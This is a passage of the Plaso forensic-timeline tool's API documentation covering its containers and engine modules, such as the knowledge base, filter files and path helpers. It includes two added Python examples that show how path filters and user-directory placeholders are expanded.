class plaso.containers.warnings.RecoveryWarning(message=None, parser_chain=None, path_spec=None)
Bases: plaso.containers.interface.AttributeContainer
Recovery warning attribute container.
Recovery warnings are warnings encountered during recovery. They are typically produced by parsers/plugins when they are unable to recover events.
message: warning message. Type str
parser_chain: parser chain to which the warning applies. Type str
path_spec: path specification of the file entry to which the warning applies. Type dfvfs.PathSpec
CONTAINER_TYPE = 'recovery_warning'

plaso.containers.windows_events module

Windows event data attribute containers.

class plaso.containers.windows_events.WindowsDistributedLinkTrackingEventData(uuid, origin)
Bases: plaso.containers.events.EventData
Windows distributed link event data attribute container.
mac_address: MAC address stored in the UUID. Type str
origin: origin of the event (event source), e.g. the path of the corresponding LNK file or the file reference of the MFT entry with the corresponding NTFS $OBJECT_ID attribute. Type str


uuid: UUID. Type str
DATA_TYPE = 'windows:distributed_link_tracking:creation'

class plaso.containers.windows_events.WindowsRegistryEventData
Bases: plaso.containers.events.EventData
Windows Registry event data attribute container.
key_path: Windows Registry key path. Type str
values: names and data of the values in the key. Type str
DATA_TYPE = 'windows:registry:key_value'

class plaso.containers.windows_events.WindowsVolumeEventData
Bases: plaso.containers.events.EventData
Windows volume event data attribute container.
device_path: volume device path. Type str
origin: origin of the event (event source), for example the corresponding Prefetch file name. Type str
serial_number: volume serial number. Type str
DATA_TYPE = 'windows:volume:creation'

Module contents

This file imports Python modules that register attribute container types.

5.1.5 plaso.engine package

Submodules

plaso.engine.artifact_filters module

Helper to create filters based on forensic artifact definitions.

class plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper(artifacts_registry, knowledge_base)
Bases: plaso.engine.filters_helper.CollectionFiltersHelper

122 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Helper to create collection filters based on artifact definitions.
Builds collection filters from forensic artifact definitions. For more information about Forensic Artifacts see: https://github.com/ForensicArtifacts/artifacts/blob/main/docs/Artifacts%20definition%20format%20and%20style%20guide.asciidoc
file_system_artifact_names: names of artifact definitions that generated file system find specifications. Type set[str]
registry_artifact_names: names of artifact definitions that generated Windows Registry find specifications. Type set[str]
BuildFindSpecs(artifact_filter_names, environment_variables=None)
  Builds find specifications from artifact definitions.
  Parameters:
  • artifact_filter_names (list[str]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
  • environment_variables (Optional[list[EnvironmentVariableArtifact]]) – environment variables.
classmethod CheckKeyCompatibility(key_path)
  Checks if a Windows Registry key path is supported by dfWinReg.
  Parameters: key_path (str) – path of the Windows Registry key.
  Returns: True if the key is compatible or False if not.
  Return type: bool

plaso.engine.configurations module

Processing configuration classes.

class plaso.engine.configurations.CredentialConfiguration(credential_data=None, credential_type=None, path_spec=None)
    Bases: plaso.containers.interface.AttributeContainer

    Configuration settings for a credential.

    credential_data
        credential data. Type: bytes
    credential_type
        credential type. Type: str
    path_spec
        path specification. Type: dfvfs.PathSpec

    CONTAINER_TYPE = 'credential_configuration'

class plaso.engine.configurations.EventExtractionConfiguration
    Bases: plaso.containers.interface.AttributeContainer

    Configuration settings for event extraction. These settings are primarily used by the parser mediator.

    filter_object
        filter that specifies which events to include. Type: objectfilter.Filter

    CONTAINER_TYPE = 'event_extraction_configuration'

class plaso.engine.configurations.ExtractionConfiguration
    Bases: plaso.containers.interface.AttributeContainer

    Configuration settings for extraction. These settings are primarily used by the extraction worker.

    hasher_file_size_limit
        maximum file size that hashers should process, where 0 or None represents unlimited. Type: int
    hasher_names_string
        comma separated string of names of hashers to use during processing. Type: str
    process_archives
        True if archive files should be scanned for file entries. Type: bool
    process_compressed_streams
        True if file content in compressed streams should be processed. Type: bool
    yara_rules_string
        Yara rule definitions. Type: str

    CONTAINER_TYPE = 'extraction_configuration'

class plaso.engine.configurations.ProcessingConfiguration
    Bases: plaso.containers.interface.AttributeContainer

    Configuration settings for processing.

    artifact_filters
        names of artifact definitions that are used for filtering file system and Windows Registry key paths. Type: Optional[list[str]]
    credentials
        credential configurations. Type: list[CredentialConfiguration]
    data_location
        path to the data files. Type: str
    debug_output
        True if debug output should be enabled. Type: bool
    event_extraction
        event extraction configuration. Type: EventExtractionConfiguration
    extraction
        extraction configuration. Type: ExtractionConfiguration
    filter_file
        path to a file with find specifications. Type: str
    log_filename
        name of the log file. Type: str
    parser_filter_expression
        parser filter expression, where None represents all parsers and plugins. Type: str
    preferred_year
        preferred initial year value for year-less date and time values. Type: int
    profiling
        profiling configuration. Type: ProfilingConfiguration
    task_storage_format
        format to use for storing task results. Type: str
    task_storage_path
        path of the directory containing SQLite task storage files. Type: str
    temporary_directory
        path of the directory for temporary files. Type: str

    CONTAINER_TYPE = 'processing_configuration'

class plaso.engine.configurations.ProfilingConfiguration
    Bases: plaso.containers.interface.AttributeContainer

    Configuration settings for profiling.

    directory
        path to the directory where the profiling sample files should be stored. Type: str


    profilers
        names of the profilers to enable. Type: set(str)
        Supported profilers are:
          • 'memory', which profiles memory usage;
          • 'parsers', which profiles CPU time consumed by individual parsers;
          • 'processing', which profiles CPU time consumed by different parts of processing;
          • 'serializers', which profiles CPU time consumed by individual serializers;
          • 'storage', which profiles storage reads and writes.
    sample_rate
        the profiling sample rate, in number of event sources processed. Type: int

    CONTAINER_TYPE = 'profiling_configuration'

    HaveProfileAnalyzers()
        Determines if analyzers profiling is configured.
        Returns: True if analyzers profiling is configured.
        Return type: bool

    HaveProfileMemory()
        Determines if memory profiling is configured.
        Returns: True if memory profiling is configured.
        Return type: bool

    HaveProfileParsers()
        Determines if parsers profiling is configured.
        Returns: True if parsers profiling is configured.
        Return type: bool

    HaveProfileProcessing()
        Determines if processing profiling is configured.
        Returns: True if processing profiling is configured.
        Return type: bool

    HaveProfileSerializers()
        Determines if serializers profiling is configured.
        Returns: True if serializers profiling is configured.
        Return type: bool

    HaveProfileStorage()
        Determines if storage profiling is configured.
        Returns: True if storage profiling is configured.
        Return type: bool

    HaveProfileTaskQueue()
        Determines if task queue profiling is configured.
        Returns: True if task queue profiling is configured.
        Return type: bool

    HaveProfileTasks()
        Determines if tasks profiling is configured.
        Returns: True if tasks profiling is configured.
        Return type: bool

plaso.engine.engine module

The processing engine.

class plaso.engine.engine.BaseEngine
    Bases: object

    Processing engine interface.

    collection_filters_helper
        collection filters helper. Type: CollectionFiltersHelper
    knowledge_base
        knowledge base. Type: KnowledgeBase

    classmethod BuildArtifactsRegistry(artifact_definitions_path, custom_artifacts_path)
        Builds an artifact definitions registry from the artifact definitions file and, if available, the custom artifact definitions file.

        Parameters:
          • artifact_definitions_path (str) – path to artifact definitions file.
          • custom_artifacts_path (str) – path to custom artifact definitions file.
        Returns: artifact definitions registry.
        Return type: artifacts.ArtifactDefinitionsRegistry
        Raises: BadConfigOption – if artifact definitions cannot be read.

    BuildCollectionFilters(artifact_definitions_path, custom_artifacts_path, knowledge_base_object, artifact_filter_names=None, filter_file_path=None)
        Builds collection filters from artifacts or filter file if available.

        Parameters:
          • artifact_definitions_path (str) – path to artifact definitions file.
          • custom_artifacts_path (str) – path to custom artifact definitions file.
          • knowledge_base_object (KnowledgeBase) – knowledge base.
          • artifact_filter_names (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
          • filter_file_path (Optional[str]) – path of filter file.
        Raises: InvalidFilter – if no valid file system find specifications are built.

    classmethod CreateSession(artifact_filter_names=None, command_line_arguments=None, debug_mode=False, filter_file_path=None, preferred_encoding='utf-8', preferred_time_zone=None, preferred_year=None, text_prepend=None)
        Creates a session attribute container.

        Parameters:
          • artifact_filter_names (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths.
          • command_line_arguments (Optional[str]) – the command line arguments.
          • debug_mode (bool) – True if debug mode was enabled.
          • filter_file_path (Optional[str]) – path to a file with find specifications.
          • preferred_encoding (Optional[str]) – preferred encoding.
          • preferred_time_zone (Optional[str]) – preferred time zone.
          • preferred_year (Optional[int]) – preferred year.
          • text_prepend (Optional[str]) – text to prepend to every display name.
        Returns: session attribute container.
        Return type: Session

    GetSourceFileSystem(source_path_spec, resolver_context=None)
        Retrieves the file system of the source.

        Parameters:
          • source_path_spec (dfvfs.PathSpec) – path specification of the source to process.
          • resolver_context (dfvfs.Context) – resolver context.
        Returns: tuple containing:
          • dfvfs.FileSystem: file system.
          • path.PathSpec: mount point path specification. The mount point path specification refers to either a directory or a volume on a storage media device or image. It is needed by the dfVFS file system searcher (FileSystemSearcher) to indicate the base location of the file system.
        Return type: tuple
        Raises: RuntimeError – if the source file system path specification is not set.

    PreprocessSources(artifacts_registry_object, source_path_specs, session, storage_writer, resolver_context=None)
        Preprocesses the sources.

        Parameters:
          • artifacts_registry_object (artifacts.ArtifactDefinitionsRegistry) – artifact definitions registry.
          • source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process.
          • session (Session) – session the preprocessing is part of.
          • storage_writer (StorageWriter) – storage writer.
          • resolver_context (Optional[dfvfs.Context]) – resolver context.

plaso.engine.extractors module

The extractor class definitions.

An extractor is a class used to extract information from "raw" data.

class plaso.engine.extractors.EventExtractor(force_parser=False, parser_filter_expression=None)
    Bases: object

    Event extractor. An event extractor extracts events from event sources.

    ParseDataStream(parser_mediator, file_entry, data_stream_name)
        Parses a data stream of a file entry with the enabled parsers.

        Parameters:
          • parser_mediator (ParserMediator) – parser mediator.
          • file_entry (dfvfs.FileEntry) – file entry.
          • data_stream_name (str) – data stream name.
        Raises: RuntimeError – if the file-like object or the parser object is missing.

    ParseFileEntryMetadata(parser_mediator, file_entry)
        Parses the file entry metadata such as file system data.

        Parameters:
          • parser_mediator (ParserMediator) – parser mediator.
          • file_entry (dfvfs.FileEntry) – file entry.

    ParseMetadataFile(parser_mediator, file_entry, data_stream_name)
        Parses a metadata file.

        Parameters:
          • parser_mediator (ParserMediator) – parser mediator.
          • file_entry (dfvfs.FileEntry) – file entry.
          • data_stream_name (str) – data stream name.

class plaso.engine.extractors.PathSpecExtractor
    Bases: object

    Path specification extractor. A path specification extractor extracts path specifications from a source directory, file or storage media device or image.

    ExtractPathSpecs(path_specs, find_specs=None, recurse_file_system=True, resolver_context=None)
        Extracts path specifications from a specific source.

        Parameters:
          • path_specs (Optional[list[dfvfs.PathSpec]]) – path specifications.
          • find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications used in path specification extraction.
          • recurse_file_system (Optional[bool]) – True if extraction should recurse into a file system.
          • resolver_context (Optional[dfvfs.Context]) – resolver context.
        Yields: dfvfs.PathSpec – path specification of a file entry found in the source.

plaso.engine.filter_file module

Filter file.

class plaso.engine.filter_file.FilterFile
    Bases: object

    Filter file. A filter file contains one or more path filters.

    A path filter may contain path expansion attributes. Such an attribute is defined as anything within curly brackets, for example "\System\{my_attribute}\Path\Keyname". If the attribute "my_attribute" is defined, the placeholder in the path filter is replaced with its runtime value, giving for example "\System\MyValue\Path\Keyname".

    If the path filter needs to contain literal curly brackets, these need to be escaped with another curly bracket, for example "\System\{my_attribute}\{{123-AF25-E523}}\KeyName", where "{{123-AF25-E523}}" will be replaced with "{123-AF25-E523}" at runtime.

    ReadFromFile(path)
        Reads the path filters from the filter file.

        Parameters: path (str) – path to a filter file.
        Returns: path filters.
        Return type: list[PathFilter]
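The placeholder and escape rules described for FilterFile above are easy to get wrong (a naive search for "{...}" would treat "{{123-AF25-E523}}" as an attribute named "{123-AF25-E523"). The following is an added, self-contained Python example of that expansion written for this page; it is not plaso's code and does not reproduce the on-disk filter file format. Assumptions: the attribute values come from a plain dict standing in for the knowledge base, and a filter that references an attribute with no runtime value is dropped rather than matched literally. The function names expand_path_filter and expand_path_filters are this example's own.

```python
import re

# Token grammar from the FilterFile docstring: "{name}" is an attribute
# reference, "{{" and "}}" are escaped literal brackets. The doubled-bracket
# alternatives come first so they win over the attribute alternative.
_PLACEHOLDER_RE = re.compile(r'\{\{|\}\}|\{([^{}]+)\}')


def expand_path_filter(path_filter, attributes):
  """Expands attribute placeholders in a single path filter.

  Args:
    path_filter (str): path filter, for example
        "\\System\\{my_attribute}\\{{123-AF25-E523}}\\KeyName".
    attributes (dict[str, str]): runtime attribute values by name
        (stand-in for the knowledge base; assumption of this example).

  Returns:
    str: the expanded path filter, or None if the filter references an
        attribute that has no runtime value. Such a filter can never match
        a real path, so the caller should skip it instead of using it.
  """
  missing_attributes = []

  def _replace(match):
    token = match.group(0)
    if token == '{{':
      return '{'
    if token == '}}':
      return '}'
    name = match.group(1)
    value = attributes.get(name)
    if value is None:
      missing_attributes.append(name)
      return ''
    # re.sub uses the callback's return value verbatim, so backslashes in
    # Windows-style values are not reinterpreted as escape sequences.
    return value

  expanded = _PLACEHOLDER_RE.sub(_replace, path_filter)
  if missing_attributes:
    return None
  return expanded


def expand_path_filters(path_filters, attributes):
  """Expands a list of path filters, dropping the ones that cannot resolve."""
  expanded_filters = []
  for path_filter in path_filters:
    expanded = expand_path_filter(path_filter, attributes)
    if expanded is not None:
      expanded_filters.append(expanded)
  return expanded_filters


# Constructed sample filters and attribute values for illustration only.
SAMPLE_FILTERS = [
    '\\System\\{my_attribute}\\Path\\Keyname',
    '\\System\\{my_attribute}\\{{123-AF25-E523}}\\KeyName',
    '/home/{username}/.bash_history',
    '/etc/hosts',
]
SAMPLE_ATTRIBUTES = {'my_attribute': 'MyValue'}

if __name__ == '__main__':
  for path_filter in expand_path_filters(SAMPLE_FILTERS, SAMPLE_ATTRIBUTES):
    print(path_filter)
```

With the sample attributes the "{username}" filter is dropped because no value is known; the other three expand, and the doubled brackets collapse to single ones exactly as the docstring describes.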

plaso.engine.filters_helper module

Collection filters helper.

class plaso.engine.filters_helper.CollectionFiltersHelper
    Bases: object

    Helper for collection filters.

    excluded_file_system_find_specs
        file system find specifications of paths to exclude from the collection. Type: list[dfvfs.FindSpec]
    included_file_system_find_specs
        file system find specifications of paths to include in the collection. Type: list[dfvfs.FindSpec]
    registry_find_specs
        Windows Registry find specifications. Type: list[dfwinreg.FindSpec]

plaso.engine.knowledge_base module

The artifact knowledge base object.

The knowledge base is filled by user provided input and the pre-processing phase. It is intended to provide successive phases, like the parsing and analysis phases, with essential information like the time zone and codepage of the source data.

class plaso.engine.knowledge_base.KnowledgeBase
    Bases: object

    The knowledge base.

    AddAvailableTimeZone(time_zone, session_identifier=None)
        Adds an available time zone.

        Parameters:
          • time_zone (TimeZoneArtifact) – time zone artifact.
          • session_identifier (Optional[str]) – session identifier, where None represents the active session.
        Raises: KeyError – if the time zone already exists.

    AddEnvironmentVariable(environment_variable)
        Adds an environment variable.

        Parameters: environment_variable (EnvironmentVariableArtifact) – environment variable artifact.
        Raises: KeyError – if the environment variable already exists.

    AddUserAccount(user_account, session_identifier=None)
        Adds a user account.

        Parameters:
          • user_account (UserAccountArtifact) – user account artifact.
          • session_identifier (Optional[str]) – session identifier, where None represents the active session.
        Raises: KeyError – if the user account already exists.

    AddWindowsEventLogProvider(windows_eventlog_provider, session_identifier=None)
        Adds a Windows Event Log provider.

        Parameters:
          • windows_eventlog_provider (WindowsEventLogProviderArtifact) – Windows Event Log provider.
          • session_identifier (Optional[str]) – session identifier, where None represents the active session.
        Raises: KeyError – if the Windows Event Log provider already exists.

    GetEnvironmentVariable(name)
        Retrieves an environment variable.

        Parameters: name (str) – name of the environment variable.
        Returns: environment variable artifact or None if there was no value set for the given name.
        Return type: EnvironmentVariableArtifact

    GetEnvironmentVariables()
        Retrieves the environment variables.

        Returns: environment variable artifacts.
        Return type: list[EnvironmentVariableArtifact]

    GetHostname(session_identifier=None)
        Retrieves the hostname related to the event. If the hostname is not stored in the event it is determined based on the preprocessing information that is stored inside the storage file.

        Parameters: session_identifier (Optional[str]) – session identifier, where None represents the active session.
        Returns: hostname.
        Return type: str

    GetMountPath()
        Retrieves the mount path of the source.

        Returns: mount path of the source or None if not set.
        Return type: str

    GetSourceConfigurationArtifacts(session_identifier=None)
        Retrieves the knowledge base as source configuration artifacts.

        Parameters: session_identifier (Optional[str]) – session identifier, where None represents the active session.
        Returns: source configuration artifacts.
        Return type: list[SourceConfigurationArtifact]

    GetTextPrepend()
        Retrieves the text to prepend to the display name.

        Returns: text to prepend to the display name or None if not set.
        Return type: str

    GetUsernameByIdentifier(user_identifier, session_identifier=None)
        Retrieves the username based on a user identifier.

        Parameters:
          • user_identifier (str) – user identifier, either a UID or SID.
          • session_identifier (Optional[str]) – session identifier, where None represents the active session.
        Returns: username.
        Return type: str

    GetUsernameForPath(path)
        Retrieves a username for a specific path. This determines if the path is within a user's directory and, if so, returns the username of that user.

        Parameters: path (str) – path.
        Returns: username or None if the path does not appear to be within a user's directory.
        Return type: str

    GetValue(identifier, default_value=None)
        Retrieves a value by identifier.

        Parameters:
          • identifier (str) – case insensitive unique identifier for the value.
          • default_value (object) – default value.
        Returns: value or default value if not available.
        Return type: object
        Raises: TypeError – if the identifier is not a string type.

    HasUserAccounts()
        Determines if the knowledge base contains user accounts.

        Returns: True if the knowledge base contains user accounts.
        Return type: bool

    ReadSystemConfigurationArtifact(system_configuration, session_identifier=None)
        Reads the knowledge base values from a system configuration artifact. Note that this overwrites existing values in the knowledge base.

        Parameters:
          • system_configuration (SystemConfigurationArtifact) – system configuration artifact.
          • session_identifier (Optional[str]) – session identifier, where None represents the active session.

    SetActiveSession(session_identifier)
        Sets the active session.

        Parameters: session_identifier (str) – session identifier, where None represents the default active session.

    SetCodepage(codepage)
        Sets the codepage.

        Parameters: codepage (str) – codepage.
        Raises: ValueError – if the codepage is not supported.

    SetEnvironmentVariable(environment_variable)
        Sets an environment variable.

        Parameters: environment_variable (EnvironmentVariableArtifact) – environment variable artifact.

    SetHostname(hostname, session_identifier=None)
        Sets a hostname.

        Parameters:
          • hostname (HostnameArtifact) – hostname artifact.
          • session_identifier (Optional[str]) – session identifier, where None represents the active session.

    SetMountPath(mount_path)
        Sets the mount path of the source.

        Parameters: mount_path (str) – mount path of the source or None if the source is not mounted onto a directory.

    SetTextPrepend(text_prepend)
        Sets the text to prepend to the display name.

        Parameters: text_prepend (str) – text to prepend to the display name or None if no text should be prepended.

    SetTimeZone(time_zone)
        Sets the time zone.

        Parameters: time_zone (str) – time zone.
        Raises: ValueError – if the time zone is not supported.

    SetValue(identifier, value)
        Sets a value by identifier.

        Parameters:
          • identifier (str) – case insensitive unique identifier for the value.
          • value (object) – value.
        Raises: TypeError – if the identifier is not a string type.

    property available_time_zones
        available time zones of the current session. Type: list[TimeZone]
    property codepage
        codepage of the current session. Type: str
    property hostname
        hostname of the current session. Type: str
    property timezone
        time zone of the current session. Type: datetime.tzinfo
    property user_accounts
        user accounts of the current session. Type: list[UserAccountArtifact]
    property year
        year of the current session. Type: int

plaso.engine.logger module

The engine sub module logger.

plaso.engine.path_filters module

Path filters. Path filters are specified in filter files and are used during collection to include or exclude file system paths.

class plaso.engine.path_filters.PathCollectionFiltersHelper
    Bases: plaso.engine.filters_helper.CollectionFiltersHelper

    Path collection filters helper.

    BuildFindSpecs(path_filters, environment_variables=None)
        Builds find specifications from path filters.

        Parameters:
          • path_filters (list[PathFilter]) – path filters.
          • environment_variables (Optional[list[EnvironmentVariableArtifact]]) – environment variables.

class plaso.engine.path_filters.PathFilter(filter_type, description=None, path_separator='/', paths=None)
    Bases: object

    Path filter.

    description
        description of the purpose of the filter or None if not set. Type: str
    filter_type
        indicates if the filter should include or exclude paths during collection. Type: str
    path_separator
        path segment separator. Type: str
    paths
        paths to filter. Type: list[str]

    FILTER_TYPE_EXCLUDE = 'exclude'
    FILTER_TYPE_INCLUDE = 'include'

5.1. Subpackages 135 Plaso (log2timeline), Release 20210606 plaso.engine.path_helper module

The path helper. class plaso.engine.path_helper.PathHelper Bases: object Class that implements the path helper. classmethod ExpandGlobStars(path, path_separator) Expands globstars “**” in a path. A globstar “**” will recursively match all files and zero or more directories and subdirectories. By default the maximum recursion depth is 10 subdirectories, a numeric values after the globstar, such as “**5”, can be used to define the maximum recursion depth. Parameters • path (str) – path to be expanded. • path_separator (str) – path segment separator. Returns String path expanded for each glob. Return type list[str] classmethod ExpandUsersVariablePath(path, path_separator, user_accounts) Expands a path with a users variable, such as %%users.homedir%%. Parameters • path (str) – path with users variable. • path_separator (str) – path segment separator. • user_accounts (list[UserAccountArtifact]) – user accounts. Returns paths for which the users variables have been expanded. Return type list[str] classmethod ExpandWindowsPath(path, environment_variables) Expands a Windows path containing environment variables. Parameters • path (str) – Windows path with environment variables. • environment_variables (list[EnvironmentVariableArtifact]) – environment variables. Returns expanded Windows path. Return type str classmethod ExpandWindowsPathSegments(path_segments, environment_variables) Expands a Windows path segments containing environment variables. Parameters • path_segments (list[str]) – Windows path segments with environment variables. • environment_variables (list[EnvironmentVariableArtifact]) – environment variables. Returns expanded Windows path segments.

136 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type list[str] classmethod GetDisplayNameForPathSpec(path_spec, mount_path=None, text_prepend=None) Retrieves the display name of a path specification. Parameters • path_spec (dfvfs.PathSpec) – path specification. • mount_path (Optional[str]) – path where the file system that is used by the path spec- ification is mounted, such as “/mnt/image”. The mount path will be stripped fromthe absolute path defined by the path specification. • text_prepend (Optional[str]) – text to prepend. Returns human readable version of the path specification or None if no path specification was provided. Return type str classmethod GetRelativePathForPathSpec(path_spec, mount_path=None) Retrieves the relative path of a path specification. If a mount path is defined the path will be relative to the mount point, otherwise the path is relativetothe root of the file system that is used by the path specification. Parameters • path_spec (dfvfs.PathSpec) – path specification. • mount_path (Optional[str]) – path where the file system that is used by the path spec- ification is mounted, such as “/mnt/image”. The mount path will be stripped fromthe absolute path defined by the path specification. Returns relative path or None. Return type str plaso.engine.plaso_queue module
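ExpandGlobStars and ExpandUsersVariablePath above, and GetUsernameForPath in the knowledge_base module, all work from the same inputs: a path, its segment separator and the user accounts collected during preprocessing. The following is an added, self-contained Python example that implements the documented behaviour of those three operations against constructed user accounts; it is this page's illustration, not plaso's own code. Assumptions are marked in the code: the UserAccount record stands in for UserAccountArtifact with only the fields used here; a globstar "**N" is expanded to one path per depth from one to N wildcard segments (the shape of the result list is an assumption, the default depth of 10 is from the docstring); accounts without a user directory cannot satisfy %%users.homedir%% and are skipped; backslash-separated paths are compared case-insensitively and a user directory only matches on whole path segments.

```python
import collections

# Constructed stand-in for UserAccountArtifact with only the fields used here
# (assumption of this example, not plaso's class).
UserAccount = collections.namedtuple(
    'UserAccount', ['identifier', 'username', 'user_directory'])

DEFAULT_GLOBSTAR_DEPTH = 10
USERS_HOMEDIR_VARIABLE = '%%users.homedir%%'


def expand_glob_stars(path, path_separator, default_depth=DEFAULT_GLOBSTAR_DEPTH):
  """Expands the first globstar segment ("**" or "**N") of a path.

  The segment is replaced by 1..N "*" segments, giving one path per depth
  (assumed result shape). A missing or unparsable N falls back to
  default_depth. A path without a globstar is returned unchanged.
  """
  segments = path.split(path_separator)
  for index, segment in enumerate(segments):
    if not segment.startswith('**'):
      continue
    depth = default_depth
    if len(segment) > 2:
      try:
        depth = int(segment[2:], 10)
      except ValueError:
        depth = default_depth
    if depth < 1:
      depth = default_depth
    head, tail = segments[:index], segments[index + 1:]
    return [path_separator.join(head + ['*'] * count + tail)
            for count in range(1, depth + 1)]
  return [path]


def expand_users_variable_path(path, path_separator, user_accounts):
  """Expands %%users.homedir%% once per account that has a user directory.

  Accounts without a directory (service accounts, for example) are skipped;
  a path that does not contain the variable is returned unchanged.
  """
  if USERS_HOMEDIR_VARIABLE not in path:
    return [path]
  expanded = []
  for user_account in user_accounts:
    if not user_account.user_directory:
      continue
    user_directory = user_account.user_directory.rstrip(path_separator)
    expanded.append(path.replace(USERS_HOMEDIR_VARIABLE, user_directory))
  return expanded


def get_username_for_path(path, path_separator, user_accounts):
  """Returns the username whose user directory contains path, else None.

  Matching is on whole segments, so "C:\\Users\\alice" does not claim
  "C:\\Users\\alicesmith\\...". Backslash-separated paths are compared
  case-insensitively (Windows file systems are case-insensitive); when user
  directories nest, the deepest match wins.
  """
  def fold(value):
    return value.lower() if path_separator == '\\' else value

  folded_path = fold(path)
  best_account, best_length = None, -1
  for user_account in user_accounts:
    if not user_account.user_directory:
      continue
    directory = fold(user_account.user_directory.rstrip(path_separator))
    if folded_path == directory or folded_path.startswith(directory + path_separator):
      if len(directory) > best_length:
        best_account, best_length = user_account, len(directory)
  return best_account.username if best_account else None


def expand_collection_path(path, path_separator, user_accounts):
  """Resolves the users variable first, then globstars, as a collection filter needs."""
  expanded = []
  for user_path in expand_users_variable_path(path, path_separator, user_accounts):
    expanded.extend(expand_glob_stars(user_path, path_separator))
  return expanded


# Constructed sample accounts: two profile directories and one account without one.
SAMPLE_USER_ACCOUNTS = [
    UserAccount('S-1-5-21-1000', 'alice', 'C:\\Users\\alice'),
    UserAccount('S-1-5-21-1001', 'bob', 'C:\\Users\\bob'),
    UserAccount('S-1-5-18', 'SYSTEM', None),
]

if __name__ == '__main__':
  for expanded_path in expand_collection_path(
      '%%users.homedir%%\\AppData\\Roaming\\**2\\*.lnk', '\\', SAMPLE_USER_ACCOUNTS):
    print(expanded_path)
  print(get_username_for_path('C:\\Users\\Alice\\NTUSER.DAT', '\\', SAMPLE_USER_ACCOUNTS))
```

Running the sample expands the single filter into four concrete paths (two users times two depths) and attributes the mixed-case NTUSER.DAT path to "alice"; a path under a lookalike directory such as C:\Users\alicesmith is not attributed to anyone.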

plaso.engine.plaso_queue module

Queue management implementation for Plaso.

This file contains an implementation of a queue used by plaso for queue management. The queue has been abstracted in order to provide support for different implementations of the queueing mechanism, to support multi processing and scalability.

class plaso.engine.plaso_queue.Queue
    Bases: object

    Class that implements the queue interface.

    abstract Close(abort=False)
        Closes the queue.

        Parameters: abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost.

    abstract IsEmpty()
        Determines if the queue is empty.

    abstract Open()
        Opens the queue, ready to enqueue or dequeue items.

    abstract PopItem()
        Pops an item off the queue.

        Raises: QueueEmpty – when the queue is empty.

    abstract PushItem(item, block=True)
        Pushes an item onto the queue.

        Parameters:
          • item (object) – item to add.
          • block (bool) – whether to block if the queue is full.
        Raises: QueueFull – if the queue is full and the item could not be added.

class plaso.engine.plaso_queue.QueueAbort
    Bases: object

    Class that implements a queue abort.

plaso.engine.process_info module

Information about a running process.

class plaso.engine.process_info.ProcessInfo(pid)
    Bases: object

    Provides information about a running process.

    GetUsedMemory()
        Retrieves the amount of memory used by the process.

        Returns: amount of memory in bytes used by the process or None if not available.
        Return type: int

plaso.engine.processing_status module

Processing status classes.

class plaso.engine.processing_status.EventsStatus
    Bases: object

    The status of the events.

    number_of_duplicate_events
        number of duplicate events, not including the original. Type: int
    number_of_events_from_time_slice
        number of events from time slice. Type: int
    number_of_filtered_events
        number of events excluded by the event filter. Type: int
    number_of_macb_grouped_events
        number of events grouped based on MACB. Type: int
    total_number_of_events
        total number of events in the storage file. Type: int

class plaso.engine.processing_status.ProcessStatus
    Bases: object

    The status of an individual process.

    display_name
        human readable name of the file entry currently being processed by the process. Type: str
    identifier
        process identifier. Type: str
    last_running_time
        timestamp of the last update when the process had a running process status. Type: int
    number_of_consumed_event_tags
        total number of event tags consumed by the process. Type: int
    number_of_consumed_event_tags_delta
        number of event tags consumed by the process since the last status update. Type: int
    number_of_consumed_events
        total number of events consumed by the process. Type: int
    number_of_consumed_events_delta
        number of events consumed by the process since the last status update. Type: int
    number_of_consumed_reports
        total number of event reports consumed by the process. Type: int
    number_of_consumed_reports_delta
        number of event reports consumed by the process since the last status update. Type: int
    number_of_consumed_sources
        total number of event sources consumed by the process. Type: int
    number_of_consumed_sources_delta
        number of event sources consumed by the process since the last status update. Type: int
    number_of_consumed_extraction_warnings
        total number of extraction warnings consumed by the process. Type: int
    number_of_consumed_extraction_warnings_delta
        number of extraction warnings consumed by the process since the last status update. Type: int
    number_of_produced_event_tags
        total number of event tags produced by the process. Type: int
    number_of_produced_event_tags_delta
        number of event tags produced by the process since the last status update. Type: int
    number_of_produced_events
        total number of events produced by the process. Type: int
    number_of_produced_events_delta
        number of events produced by the process since the last status update. Type: int
    number_of_produced_reports
        total number of event reports produced by the process. Type: int
    number_of_produced_reports_delta
        number of event reports produced by the process since the last status update. Type: int
    number_of_produced_sources
        total number of event sources produced by the process. Type: int
    number_of_produced_sources_delta
        number of event sources produced by the process since the last status update. Type: int
    number_of_produced_extraction_warnings
        total number of extraction warnings produced by the process. Type: int
    number_of_produced_extraction_warnings_delta
        number of extraction warnings produced by the process since the last status update. Type: int
    pid
        process identifier (PID). Type: int
    status
        human readable status indication such as "Hashing" or "Idle". Type: str
    used_memory
        size of used memory in bytes. Type: int

    UpdateNumberOfEventReports(number_of_consumed_reports, number_of_produced_reports)
        Updates the number of event reports.

        Parameters:
          • number_of_consumed_reports (int) – total number of event reports consumed by the process.
          • number_of_produced_reports (int) – total number of event reports produced by the process.
        Returns: True if either number of event reports has increased.
        Return type: bool
        Raises: ValueError – if the consumed or produced number of event reports is smaller than the value of the previous update.

    UpdateNumberOfEventSources(number_of_consumed_sources, number_of_produced_sources)
        Updates the number of event sources.

        Parameters:
          • number_of_consumed_sources (int) – total number of event sources consumed by the process.
          • number_of_produced_sources (int) – total number of event sources produced by the process.
        Returns: True if either number of event sources has increased.
        Return type: bool
        Raises: ValueError – if the consumed or produced number of event sources is smaller than the value of the previous update.

    UpdateNumberOfEventTags(number_of_consumed_event_tags, number_of_produced_event_tags)
        Updates the number of event tags.

        Parameters:
          • number_of_consumed_event_tags (int) – total number of event tags consumed by the process.
          • number_of_produced_event_tags (int) – total number of event tags produced by the process.
        Returns: True if either number of event tags has increased.
        Return type: bool
        Raises: ValueError – if the consumed or produced number of event tags is smaller than the value of the previous update.

    UpdateNumberOfEvents(number_of_consumed_events, number_of_produced_events)
        Updates the number of events.

        Parameters:
          • number_of_consumed_events (int) – total number of events consumed by the process.
          • number_of_produced_events (int) – total number of events produced by the process.
